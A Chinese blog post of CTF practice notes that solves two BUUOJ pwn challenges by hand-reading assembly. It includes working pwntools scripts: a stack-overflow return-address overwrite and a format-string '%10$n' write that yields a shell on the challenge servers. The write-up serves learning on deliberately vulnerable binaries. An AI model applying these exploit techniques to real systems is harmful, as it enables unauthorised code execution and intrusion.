做几道pwn题,不使用ida的反汇编功能。
buuoj:ciscn_2019_n_1
检查保护机制,只开启了数据段不可执行
ida查看main函数汇编代码
根据汇编代码写出main函数的反汇编代码
setvbuf(cs:__bss_start, 0, 2, 0); servbuf(cs:stdin@@GLIBC_2_2_5, 0, 2, 0); func(); return;
关键函数func
其中cs:dword_4007F4的值为
因此func函数对应的反汇编代码为
func(){
byte var_30[44] //字节型,char
dword var_4 //双字型,4字节浮点数,float
var_4 = 0
put("Let's guess the number.");
gets(var_30);
if(var_4 = 0x41348000)
system("cat /flag");
else
loc_4006CF();
}
loc_4006CF(){
puts("Its value should be 11.28125")
}
记录学习到的指令和寄存器:
xmm:它们是 128 位宽,指令可以将它们视为 64、32(整数和浮点)、16 或 8 位(仅限整数)值的数组
movss:移动单精度浮点数
ucomiss:浮点数比较。改变寄存器ZF/PF/CF的值,表示大于/小于/等于
pxor:按位异或
由汇编指令可知可控制的字符串var_30距离ebp为0x30字节,则距离返回地址为(0x30+8)。又知system("cat /flag")的执行地址为0x4006BE。
pwntool构造payload
#!/usr/bin/env python3
from pwn import *
p = remote("node4.buuoj.cn", 27953)
payload = b"a" * (48 + 8) + p64(0x4006BE)
p.sendline(payload)
p.interactive()
成功获得flag
[第五空间2019 决赛]PWN5
查看保护,开启了canary,说明不能用覆盖返回地址的方式执行代码。
ida查看汇编代码。
挺长的,试试手搓反汇编
main(int x) //执行push ebp之前,取出栈顶指针高四字节的栈元素,应该是main函数的参数
int fd
char nptr[16]
char buf[100]
int var_c
int anonymous_0[2] //对比ida反汇编,这里应该是int指针
sub_8049130(); //这个函数只执行了一条指令mov ebx,[esp+0],把当前栈顶指针的值赋给ebx,ebx用于在内存单元寻址
var_c = 0x14;
_setvbuf(,0,2,0);
int seed = time(0);
_srand(seed);
fd = _open("/dev/urandom",0);
_read(fd, &dword_804C044, 4); //随机生成一个数放在内存&dword_804C044中
_printf("your name");
_read(0,buf,0x63); //获取输入
_printf("Hello,");
printf(buf); //危险函数,可构造格式化字符串泄漏内存地址
printf("your passwd");
_read(0,nptr,0x0F); //获取输入
if(_atoi(nptr) == &dword_804C044){ //判断输入是否与内存中804C044这个地址的数据相等
_puts("ok!!"); _system("/bin/sh");
}
else{
_puts("fail");
}
if(0x14 ^ var_c = 0)
return
else
sub_80493D0() //与sub_8049130()类似
return
与ida反汇编对比。没有分析出int *v7这个指针。
分析:利用第一个输入,输入格式化字符串修改地址804C044的数据。再通过第二个输入,输入修改后的值
首先查看输入的字符串是printf()函数格式化字符串之后的第几个参数
数出来是第十个
验证是否正确
构造payload修改地址中的数据
#!/usr/bin/env python3
from pwn import *
p = remote("node4.buuoj.cn", 29470)
payload = p32(0x804C044) + b'%10$n' //'%10$n',表示把格式化字符串后第十个参数的数据当做地址,并把前面已经输出的字符数写入这个地址
p.sendlineafter("your name:", payload)
p.recvuntil("passwd:")
p.sendline("4") //'%10$n'前输出了b'0804C044'共四个字节,即字符数等于4
p.interactive()
成功打通
标签:int,笔记,var,地址,反汇编,pwn,dword,payload,刷题 From: https://www.cnblogs.com/jimmy-hwang/p/17284092.html